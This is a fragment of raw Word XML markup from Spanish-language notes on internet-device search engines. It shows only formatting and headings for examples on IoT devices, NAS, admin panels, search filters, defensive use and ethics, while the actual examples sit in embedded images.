          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🖨️</w:t>
      </w:r>
      <w:r w:rsidRPr="0038681D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0038681D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008F03B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DISPOSITIVOS IOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D1883" w14:textId="6BA0C450" w:rsidR="008F03B5" w:rsidRDefault="008F03B5" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F03B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11CB42A7" wp14:editId="3AAD1F64">
            <wp:extent cx="5173980" cy="2242058"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="516671503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71503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8633" cy="22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92F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DB692F" w:rsidRPr="00DB692F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11981DC9" wp14:editId="1B5E32A3">
            <wp:extent cx="6858000" cy="2849880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="21083617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1703" name="Imagen 1" descr="Captura de pantalla de computador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69AD" w14:textId="77777777" w:rsidR="00DB692F" w:rsidRDefault="00DB692F" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32951F26" w14:textId="77777777" w:rsidR="00DB692F" w:rsidRPr="00DB692F" w:rsidRDefault="00DB692F" w:rsidP="00DB692F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB692F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>💾</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB692F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 8: ALMACENAMIENTO EN RED (NAS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8729B" w14:textId="534503ED" w:rsidR="00DB692F" w:rsidRDefault="00B94D4D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19B46B59" wp14:editId="57D39807">
            <wp:extent cx="5394960" cy="2303848"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="15037636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636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5318" cy="23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B981" w14:textId="77777777" w:rsidR="00B94D4D" w:rsidRPr="00B94D4D" w:rsidRDefault="00B94D4D" w:rsidP="00B94D4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94D4D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B94D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 9: PANELES ADMINISTRATIVOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B02C0" w14:textId="7E9B2A37" w:rsidR="00B94D4D" w:rsidRDefault="00B94D4D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B94D4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21AF8CD9" wp14:editId="5A193D27">
            <wp:extent cx="6858000" cy="2830830"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2023780323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0323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6F8F" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F573ED6" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791E0F82" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E74E92" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B6EC9B" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78095C11" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0830B132" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D9B208" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289EEC58" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C709997" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D4C4BC" w14:textId="77777777" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45349BA9" w14:textId="5F4A886B" w:rsidR="009A5C6C" w:rsidRPr="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:r w:rsidRPr="009A5C6C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="009A5C6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 9: PANELES ADMINISTRATIVOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215738F3" w14:textId="7A746547" w:rsidR="009A5C6C" w:rsidRDefault="009A5C6C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A5C6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E5E415D" wp14:editId="0EB88FFE">
            <wp:extent cx="5029200" cy="2154640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126502053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2053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1282" cy="21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485" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRPr="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="00071B2D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071B2D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00071B2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 10: VULNERABILIDADES ESPECÍFICAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CF60C" w14:textId="08324BC2" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00071B2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C90FAEA" wp14:editId="312F8E1D">
            <wp:extent cx="5006340" cy="2134648"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="13248007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07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3935" cy="21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3DB4" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE3D19D" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3852B63A" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B3B9F9" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C3A060" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3797593A" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8CF95D" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3F0C8E" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696CCB4C" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCB5C5A" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75027F77" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0087ED6C" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E13B69" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36279415" w14:textId="77777777" w:rsidR="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDAE541" w14:textId="41863A71" w:rsidR="00071B2D" w:rsidRPr="00071B2D" w:rsidRDefault="00071B2D" w:rsidP="00071B2D">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00706E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00071B2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CONSULTAS COMBINADAS AVANZADAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930E37D" w14:textId="73791E8E" w:rsidR="00071B2D" w:rsidRDefault="00B25093" w:rsidP="001A31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1E5E9F" wp14:editId="25DEBBA9">
            <wp:extent cx="5147035" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="18746567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30" cy="27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0374EDD" wp14:editId="6E037FC2">
            <wp:extent cx="5128260" cy="1982927"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99306158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28" cy="19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78DA" w14:textId="3F9146F1" w:rsidR="00B25093" w:rsidRPr="00071B2D" w:rsidRDefault="00B25093" w:rsidP="00B25093">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25093">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.5.3 USO DEFENSIVO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CEB75F" w14:textId="09449EF2" w:rsidR="00B25093" w:rsidRDefault="004622BB" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004622BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28926F69" wp14:editId="1E33C2F3">
            <wp:extent cx="5135880" cy="2183700"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="4023816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816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2796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B2E" w14:textId="77777777" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D31C2FC" w14:textId="77777777" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A67D10D" w14:textId="77777777" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1124C04A" w14:textId="77777777" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54978319" w14:textId="77777777" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBBC827" w14:textId="28B0889A" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="00525E63">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B25093">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25093">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00525E63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CONSIDERACIONES ÉTICAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7301544A" w14:textId="731043CC" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="00525E63">
      <w:r w:rsidRPr="00525E63">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5205E856" wp14:editId="1257AF52">
            <wp:extent cx="3611880" cy="2573129"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="13081368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36812" name="Imagen 1" descr="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6497" cy="25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9F39" w14:textId="7628E639" w:rsidR="00525E63" w:rsidRPr="00F90986" w:rsidRDefault="00525E63" w:rsidP="00525E63">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.5.5 </w:t>
      </w:r>
      <w:r w:rsidR="00F90986" w:rsidRPr="00F90986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>COMANDOS category, hash, postal, región / state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504A9B46" w14:textId="034B3EA7" w:rsidR="00525E63" w:rsidRDefault="00525E63" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>COMANDOS QUE FALTAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8784E0" w14:textId="77777777" w:rsidR="003A2DF2" w:rsidRDefault="003A2DF2" w:rsidP="003A2DF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>category:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDABF9E" w14:textId="0442E006" w:rsidR="003A2DF2" w:rsidRPr="003A2DF2" w:rsidRDefault="003A2DF2" w:rsidP="003A2DF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1498FF34" wp14:editId="6AACE63D">
            <wp:extent cx="4655820" cy="951425"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="4995817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81725" name="Imagen 1" descr="Interfaz de usuario gráfic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6519" cy="9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BF1D" w14:textId="77777777" w:rsidR="003A2DF2" w:rsidRDefault="003A2DF2" w:rsidP="003A2DF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30722A0F" w14:textId="6D8AAD64" w:rsidR="003A2DF2" w:rsidRPr="003A2DF2" w:rsidRDefault="003A2DF2" w:rsidP="003A2DF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C2ACDCF" wp14:editId="6A6FE9FC">
            <wp:extent cx="6858000" cy="1284605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4641869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869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B744" w14:textId="77777777" w:rsidR="003A2DF2" w:rsidRDefault="003A2DF2" w:rsidP="003A2DF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>postal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2219F0" w14:textId="16739CD7" w:rsidR="003A2DF2" w:rsidRPr="003A2DF2" w:rsidRDefault="003A2DF2" w:rsidP="003A2DF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C54A537" wp14:editId="180293A2">
            <wp:extent cx="4556760" cy="584362"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="92585305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305" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación, Word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69997" cy="5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DEFB" w14:textId="77777777" w:rsidR="003A2DF2" w:rsidRPr="003A2DF2" w:rsidRDefault="003A2DF2" w:rsidP="003A2DF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>region: / state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E6945" w14:textId="70C50E3C" w:rsidR="00525E63" w:rsidRDefault="003A2DF2" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52C00ED4" wp14:editId="37481A5E">
            <wp:extent cx="6858000" cy="1078865"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="3079151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15192" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación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22C2" w14:textId="77777777" w:rsidR="003226ED" w:rsidRDefault="003226ED" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24231407" w14:textId="72AC9795" w:rsidR="003226ED" w:rsidRDefault="003226ED" w:rsidP="003226ED">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A15FD6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00BF0066" w:rsidRPr="00A15FD6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A15FD6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Censys</w:t>
      </w:r>
      <w:r w:rsidR="00A15FD6" w:rsidRPr="00A15FD6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, Zmap y Zgrab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD5526" w14:textId="77777777" w:rsidR="00D934B4" w:rsidRPr="00D934B4" w:rsidRDefault="00D934B4" w:rsidP="00D934B4"/>
